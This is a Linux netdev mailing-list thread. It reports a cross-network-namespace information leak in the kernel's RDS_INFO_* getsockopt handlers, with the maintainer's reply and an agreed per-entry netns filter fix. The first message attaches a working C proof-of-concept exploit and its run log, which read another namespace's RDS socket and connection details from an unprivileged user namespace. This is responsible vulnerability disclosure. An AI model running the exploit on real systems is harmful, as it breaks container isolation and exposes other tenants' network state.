Netdev List
* rds: possible cross netns leak via RDS_INFO_* getsockopt
@ 2026-05-05  8:37 Xie Maoyi
  2026-05-05 22:07 ` Allison Henderson
  0 siblings, 1 reply; 3+ messages in thread
From: Xie Maoyi @ 2026-05-05  8:37 UTC (permalink / raw)
  To: achender@kernel.org
  Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
	rds-devel@oss.oracle.com

[-- Attachment #1: Type: text/plain, Size: 2600 bytes --]

Hi all,

We are not sure whether what we observed is a real bug or
intended behaviour. We would appreciate your view.

In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
registered in rds_info_funcs[]. Each handler reads a global list
that is not pernet:

  rds_sock_info / rds6_sock_info        -> rds_sock_list
  rds_tcp_tc_info / rds6_tcp_tc_info    -> rds_tcp_tc_list
  rds_conn_info / rds6_conn_info        -> rds_conn_hash[]

None of those filter by the caller's netns. rds_info_getsockopt()
also has no netns or capable() check. rds_create() has no
capable() check either. So AF_RDS is reachable from an
unprivileged user namespace.

Our reading is that an unprivileged caller in a fresh user_ns
plus netns can read RDS state from init_net. We see this in
practice on the latest net tree.

The fields that come back include:

  RDS_INFO_SOCKETS:     bound addr, port, sock inode of every
                        RDS socket on the host
  RDS_INFO_TCP_SOCKETS: peer addr, port, last_sent_nxt,
                        last_expected_una, last_seen_una of
                        every rds-tcp connection on the host
  RDS_INFO_CONNECTIONS: peer addr, port, cp_next_tx_seq,
                        cp_next_rx_seq of every RDS connection
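
For reference, a minimal sketch of how one RDS_INFO_SOCKETS record could be decoded in userspace. The struct layout is the one declared in the attached PoC; `struct sock_view` and `decode_sock_record()` are hypothetical names used only for this illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Layout as declared in the attached PoC; 28 bytes when packed. */
struct rds_info_socket {
    uint32_t sndbuf;
    uint32_t bound_addr;      /* network byte order */
    uint32_t connected_addr;  /* network byte order */
    uint16_t bound_port;      /* network byte order */
    uint16_t connected_port;  /* network byte order */
    uint32_t rcvbuf;
    uint64_t inum;
} __attribute__((packed));

static_assert(sizeof(struct rds_info_socket) == 28, "unexpected record size");

/* Hypothetical host-order view of the fields of interest. */
struct sock_view {
    char     bound[INET_ADDRSTRLEN];
    uint16_t port;
    uint64_t inum;
};

/* Decode record number idx from a raw getsockopt() buffer of len bytes.
 * memcpy avoids taking the address of a packed struct member. */
static int decode_sock_record(const void *buf, size_t len, size_t idx,
                              struct sock_view *out)
{
    struct rds_info_socket rec;
    struct in_addr addr;

    if ((idx + 1) * sizeof(rec) > len)
        return -1;                      /* record not fully present */
    memcpy(&rec, (const char *)buf + idx * sizeof(rec), sizeof(rec));
    addr.s_addr = rec.bound_addr;
    if (!inet_ntop(AF_INET, &addr, out->bound, sizeof(out->bound)))
        return -1;
    out->port = ntohs(rec.bound_port);
    out->inum = rec.inum;
    return 0;
}
```

The 28-byte record size matches the each=28 value in the attached run log.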

A small reproducer is attached as poc_rds_info.c. With rds and
rds_tcp loaded, the steps are:

  modprobe rds
  modprobe rds_tcp
  ./poc_rds_info

The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
root. It then enters a fresh user_ns plus netns and opens AF_RDS
there. The attacker side reads RDS_INFO_SOCKETS and sees the
init_net socket. A run log is attached as poc_verification.log.
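
The length handling that the PoC relies on can be modelled in userspace. This is a sketch of the return convention as it appears from reading rds_info_getsockopt(), not kernel code; `model_info_getsockopt()` and `model_entries()` are hypothetical names.

```c
#include <assert.h>
#include <errno.h>

/* Hypothetical model of the length handling, not kernel code.
 *   each : size of one record as reported by the handler
 *   nr   : number of records the handler found
 *   *len : in: caller's buffer size; out: total bytes required/returned
 * Returns the per-record size on success, or -ENOSPC when the buffer is
 * too small (userspace sees that as rc = -1 with errno = ENOSPC). */
static int model_info_getsockopt(int each, int nr, int *len)
{
    int total;

    assert(each > 0);   /* a zero record size is treated as a bug */
    total = nr * each;
    if (total > *len) {
        *len = total;
        return -ENOSPC;
    }
    *len = total;
    return each;
}

/* Number of records in a successful reply. */
static int model_entries(int rc, int len)
{
    return rc > 0 ? len / rc : 0;
}
```

With a zero-length buffer and two 28-byte records the model returns -ENOSPC and sets len to 56, the same shape as the count-probe(SOCKETS) line in the attached log. With no records it returns the record size and len=0, as in the count-probe(TCP_SOCKETS) line.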

We are not sure if this counts as a bug or is by design. The
RDS_INFO_* interface looks diagnostic. It may be expected to be
host wide. On the other hand, AF_RDS is reachable from an
unprivileged user namespace, which is what surprised us.

Could you let us know whether you consider this worth fixing? If
yes, we have a draft patch that gates rds_info_getsockopt() to
init_net. We can send it once you confirm the direction.

Thanks for your time.

Maoyi Xie and Praveen Kakkolangara

Maoyi Xie
Nanyang Technological University
https://maoyixie.com/
________________________________

CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
Towards a sustainable earth: Print only when necessary. Thank you.

[-- Attachment #2: poc_verification.log --]
[-- Type: application/octet-stream, Size: 1183 bytes --]

[victim] AF_RDS bound 127.0.0.1:4242 in init_net (root)
[init-probe] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[init-probe] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
    [0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
    *** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[init-probe] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[init-probe] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries
[attacker] in netns=net:[4026532260] uid=0
[attacker] AF_RDS opened in fresh netns -> fd=4
[attacker] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[attacker] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
    [0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
    *** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[attacker] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[attacker] getsockopt(TCP_SOCKETS) rc=41 (each=41) len=0 -> 0 entries
[attacker] count-probe(CONNECTIONS) rc=42 errno=28 optlen-after=0
[attacker] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries

[-- Attachment #3: poc_rds_info.c --]
[-- Type: text/plain, Size: 5895 bytes --]

/* PoC v2: RDS RDS_INFO_* cross-netns getsockopt leak.
 * Build: gcc poc_rds_info.c -o poc_rds_info
 * Run as root in init_net.
 */
#define _GNU_SOURCE
#include <stdint.h>   /* uint16_t/uint32_t/uint64_t used below */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>

#ifndef AF_RDS
#define AF_RDS 21
#endif
#ifndef SOL_RDS
#define SOL_RDS 276
#endif

#define RDS_INFO_COUNTERS         10000
#define RDS_INFO_CONNECTIONS      10001
#define RDS_INFO_SEND_MESSAGES    10003
#define RDS_INFO_RETRANS_MESSAGES 10004
#define RDS_INFO_RECV_MESSAGES    10005
#define RDS_INFO_SOCKETS          10006
#define RDS_INFO_TCP_SOCKETS      10007
#define RDS6_INFO_CONNECTIONS     10011
#define RDS6_INFO_SOCKETS         10015
#define RDS6_INFO_TCP_SOCKETS     10016

struct rds_info_socket {
    uint32_t sndbuf;
    uint32_t bound_addr;
    uint32_t connected_addr;
    uint16_t bound_port;
    uint16_t connected_port;
    uint32_t rcvbuf;
    uint64_t inum;
} __attribute__((packed));

#define VICTIM_PORT 4242

static const char *opt_name(int o) {
    switch(o){case 10000:return "COUNTERS";case 10001:return "CONNECTIONS";
    case 10003:return "SEND_MSG";case 10004:return "RETRANS_MSG";
    case 10005:return "RECV_MSG";case 10006:return "SOCKETS";
    case 10007:return "TCP_SOCKETS";case 10011:return "6_CONNECTIONS";
    case 10015:return "6_SOCKETS";case 10016:return "6_TCP_SOCKETS";}
    return "?";
}

static void probe_one(int s, int opt, const char *who) {
    char buf[8192];
    socklen_t len = sizeof(buf);
    int rc = getsockopt(s, SOL_RDS, opt, buf, &len);
    if (rc < 0) {
        fprintf(stderr, "[%s] getsockopt(%s) rc=%d errno=%d (%s)\n",
                who, opt_name(opt), rc, errno, strerror(errno));
        return;
    }
    /* On success rc is the size of one record and len the total bytes. */
    int each = rc;
    int nentries = each ? (int)len / each : 0;
    fprintf(stderr, "[%s] getsockopt(%s) rc=%d (each=%d) len=%u -> %d entries\n",
            who, opt_name(opt), rc, each, (unsigned)len, nentries);
    if (opt == RDS_INFO_SOCKETS && nentries > 0) {
        struct rds_info_socket *si = (void *)buf;
        for (int i = 0; i < nentries; i++) {
            char b[32];
            inet_ntop(AF_INET, &si[i].bound_addr, b, sizeof(b));
            fprintf(stderr, "    [%d] bound=%s:%u inum=%llu sndbuf=%u rcvbuf=%u\n",
                    i, b, ntohs(si[i].bound_port),
                    (unsigned long long)si[i].inum,
                    si[i].sndbuf, si[i].rcvbuf);
            if (si[i].bound_addr == htonl(0x7f000001) &&
                ntohs(si[i].bound_port) == VICTIM_PORT) {
                fprintf(stderr,
                  "    *** LEAK: this is the victim's init_net socket "
                  "(127.0.0.1:%u) — visible from attacker's fresh netns ***\n",
                  VICTIM_PORT);
            }
        }
    }
}

static void probe_count(int s, int opt, const char *who) {
    /* len=0 -> kernel returns -ENOSPC + total in optlen, exposing count.
     * With no entries the call succeeds and rc is the record size.
     * errno is only meaningful when rc < 0; otherwise the printed value
     * is stale from an earlier call. */
    char buf[1];
    socklen_t len = 0;
    int rc = getsockopt(s, SOL_RDS, opt, buf, &len);
    fprintf(stderr, "[%s] count-probe(%s) rc=%d errno=%d optlen-after=%u\n",
            who, opt_name(opt), rc, errno, (unsigned)len);
}

int main(void)
{
    /* Step 1: Victim socket in init_net. */
    int v = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (v < 0) { perror("victim socket(AF_RDS)"); return 2; }
    struct sockaddr_in vsin = { .sin_family = AF_INET,
                                .sin_port = htons(VICTIM_PORT) };
    inet_pton(AF_INET, "127.0.0.1", &vsin.sin_addr);
    if (bind(v, (struct sockaddr *)&vsin, sizeof(vsin)) < 0) {
        perror("victim bind"); return 2;
    }
    fprintf(stderr, "[victim] AF_RDS bound 127.0.0.1:%d in init_net (root)\n",
            VICTIM_PORT);

    /* Step 1b: probe from init_net to confirm rds_info works at all */
    int probe = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (probe >= 0) {
        probe_count(probe, RDS_INFO_SOCKETS, "init-probe");
        probe_one(probe,   RDS_INFO_SOCKETS, "init-probe");
        probe_count(probe, RDS_INFO_TCP_SOCKETS, "init-probe");
        probe_one(probe,   RDS_INFO_COUNTERS, "init-probe");
        close(probe);
    }

    /* Step 2: fork attacker into fresh user_ns + netns. */
    int pipefd[2];
    if (pipe(pipefd) < 0) { perror("pipe"); return 2; }
    pid_t pid = fork();
    if (pid == 0) {
        close(pipefd[0]);
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("unshare"); _exit(2);
        }
        int fd; char b[64]; int n;
        if ((fd = open("/proc/self/setgroups", O_WRONLY)) >= 0) {
            write(fd, "deny", 4); close(fd);
        }
        fd = open("/proc/self/uid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);
        fd = open("/proc/self/gid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);

        char nsa[64] = "?";  /* fallback if readlink() fails */
        ssize_t rl = readlink("/proc/self/ns/net", nsa, sizeof(nsa) - 1);
        if (rl > 0) nsa[rl] = 0;
        fprintf(stderr, "[attacker] in netns=%s uid=%u\n", nsa, getuid());

        int a = socket(AF_RDS, SOCK_SEQPACKET, 0);
        if (a < 0) { perror("[attacker] socket(AF_RDS)"); _exit(2); }
        fprintf(stderr, "[attacker] AF_RDS opened in fresh netns -> fd=%d\n", a);

        probe_count(a, RDS_INFO_SOCKETS,     "attacker");
        probe_one(a,   RDS_INFO_SOCKETS,     "attacker");
        probe_count(a, RDS_INFO_TCP_SOCKETS, "attacker");
        probe_one(a,   RDS_INFO_TCP_SOCKETS, "attacker");
        probe_count(a, RDS_INFO_CONNECTIONS, "attacker");
        probe_one(a,   RDS_INFO_COUNTERS,    "attacker");

        close(a);
        write(pipefd[1], "x", 1);
        _exit(0);
    }
    close(pipefd[1]);
    char tmp; read(pipefd[0], &tmp, 1);
    int status; waitpid(pid, &status, 0);
    close(v);
    return 0;
}


* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
  2026-05-05  8:37 rds: possible cross netns leak via RDS_INFO_* getsockopt Xie Maoyi
@ 2026-05-05 22:07 ` Allison Henderson
  2026-05-06  7:10   ` Xie Maoyi
  0 siblings, 1 reply; 3+ messages in thread
From: Allison Henderson @ 2026-05-05 22:07 UTC (permalink / raw)
  To: Xie Maoyi
  Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
	rds-devel@oss.oracle.com

On Tue, 2026-05-05 at 08:37 +0000, Xie Maoyi wrote:
> Hi all,
> 
> We are not sure whether what we observed is a real bug or
> intended behaviour. We would appreciate your view.
> 
> In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
> registered in rds_info_funcs[]. Each handler reads a global list
> that is not pernet:
> 
>   rds_sock_info / rds6_sock_info        -> rds_sock_list
>   rds_tcp_tc_info / rds6_tcp_tc_info    -> rds_tcp_tc_list
>   rds_conn_info / rds6_conn_info        -> rds_conn_hash[]
> 
> None of those filter by the caller's netns. rds_info_getsockopt()
> also has no netns or capable() check. rds_create() has no
> capable() check either. So AF_RDS is reachable from an
> unprivileged user namespace.
> 
> Our reading is that an unprivileged caller in a fresh user_ns
> plus netns can read RDS state from init_net. We see this in
> practice on the latest net tree.
> 
> The fields that come back include:
> 
>   RDS_INFO_SOCKETS:     bound addr, port, sock inode of every
>                         RDS socket on the host
>   RDS_INFO_TCP_SOCKETS: peer addr, port, last_sent_nxt,
>                         last_expected_una, last_seen_una of
>                         every rds-tcp connection on the host
>   RDS_INFO_CONNECTIONS: peer addr, port, cp_next_tx_seq,
>                         cp_next_rx_seq of every RDS connection
> 
> A small reproducer is attached as poc_rds_info.c. With rds and
> rds_tcp loaded, the steps are:
> 
>   modprobe rds
>   modprobe rds_tcp
>   ./poc_rds_info
> 
> The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
> root. It then enters a fresh user_ns plus netns and opens AF_RDS
> there. The attacker side reads RDS_INFO_SOCKETS and sees the
> init_net socket. A run log is attached as poc_verification.log.
> 
> We are not sure if this counts as a bug or is by design. The
> RDS_INFO_* interface looks diagnostic. It may be expected to be
> host wide. On the other hand, AF_RDS is reachable from an
> unprivileged user namespace, which is what surprised us.
> 
> Could you let us know whether you consider this worth fixing? If
> yes, we have a draft patch that gates rds_info_getsockopt() to
> init_net. We can send it once you confirm the direction.
> 
> Thanks for your time.
> 
> Maoyi Xie and Praveen Kakkolangara
> 
> Maoyi Xie
> Nanyang Technological University
> https://maoyixie.com/


Hi Xie,

Thanks for looking into this.  I think your findings are valid: diagnostic
or debug tools shouldn't give callers visibility into another netns.  Note,
though, that while the ib transport is limited to init_net, the tcp
transport is not (see rds_set_transport()).  A single gate in
rds_info_getsockopt() would therefore incorrectly hide entries from callers
in other netns that have legitimate rds-tcp connections of their own.  So
the fix would need a filter in each of the three handlers you've
identified, where we compare the netns of the calling socket to the netns
of the entry (or c_net for connection paths) and only copy info for
matching entries instead of every entry in the respective global list/hash.
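
As a rough userspace illustration of the per-entry comparison described above (not kernel code): `struct net_model`, `struct sock_entry` and `sock_info_filtered()` are hypothetical stand-ins for struct net, an rds_sock_list entry and a handler. The real handlers would presumably compare sock_net() of the calling socket with the entry's netns while holding the existing list lock.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for struct net; only pointer identity matters here. */
struct net_model { int id; };

/* Stand-in for one entry on a global, non-pernet list. */
struct sock_entry {
    const struct net_model *net;   /* namespace the entry belongs to */
    unsigned short port;           /* example payload */
};

/* Copy the ports of entries that live in the caller's netns into out[]
 * (at most cap of them) and return how many entries matched. Entries in
 * other namespaces are skipped, so neither their contents nor their
 * number reaches the caller. */
static size_t sock_info_filtered(const struct sock_entry *list, size_t n,
                                 const struct net_model *caller,
                                 unsigned short *out, size_t cap)
{
    size_t cnt = 0;

    assert(list != NULL || n == 0);
    for (size_t i = 0; i < n; i++) {
        if (list[i].net != caller)
            continue;              /* belongs to another netns */
        if (cnt < cap)
            out[cnt] = list[i].port;
        cnt++;
    }
    return cnt;
}
```

Counting only the matching entries matters as much as copying only them, since a zero-length probe otherwise still reveals how many entries exist in other namespaces.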

Allison




* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
  2026-05-05 22:07 ` Allison Henderson
@ 2026-05-06  7:10   ` Xie Maoyi
  0 siblings, 0 replies; 3+ messages in thread
From: Xie Maoyi @ 2026-05-06  7:10 UTC (permalink / raw)
  To: Allison Henderson
  Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
	rds-devel@oss.oracle.com

Hi Allison,

Thanks for confirming the direction.

We will rewrite the patch as a per-entry netns filter in each
of the affected handlers, instead of the init_net gate in
rds_info_getsockopt() that we mentioned. Concretely:

  rds_sock_info / rds6_sock_info: skip rds_sock_list entries
    whose socket netns does not match the caller's netns.
  rds_tcp_tc_info / rds6_tcp_tc_info: skip rds_tcp_tc_list
    entries the same way.
  rds_conn_info / rds6_conn_info and the *_message_info_*
    variants: skip rds_conn_hash[] entries whose c_net does
    not match the caller's netns.

This preserves the rds-tcp behaviour where a caller outside
init_net with legitimate connections in their own netns can
still see them.
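
The difference between the two approaches can be sketched with a small userspace model. This is an illustration under simplifying assumptions, not the planned patch; `struct net_model`, `struct conn_entry`, `visible_with_gate()` and `visible_with_filter()` are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Stand-in for struct net. */
struct net_model { bool is_init; };

/* Stand-in for one rds_conn_hash[] entry; c_net mirrors the field name. */
struct conn_entry { const struct net_model *c_net; };

/* Gate approach: only a caller in init_net sees anything, and that
 * caller still sees every entry on the host. */
static size_t visible_with_gate(const struct conn_entry *h, size_t n,
                                const struct net_model *caller)
{
    assert(caller != NULL);
    (void)h;
    return caller->is_init ? n : 0;
}

/* Per-entry approach: every caller sees exactly the entries whose
 * c_net is the caller's own netns. */
static size_t visible_with_filter(const struct conn_entry *h, size_t n,
                                  const struct net_model *caller)
{
    size_t cnt = 0;

    assert(caller != NULL);
    for (size_t i = 0; i < n; i++)
        if (h[i].c_net == caller)
            cnt++;
    return cnt;
}
```

In this model a caller in a non-init netns with two rds-tcp connections of its own gets nothing from the gate but both entries from the per-entry filter.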

We will send the patch as a separate reply once it is ready
and verified against the same PoC.

Thanks,

Maoyi Xie and Praveen Kakkolangara

Maoyi Xie
Nanyang Technological University
https://maoyixie.com/
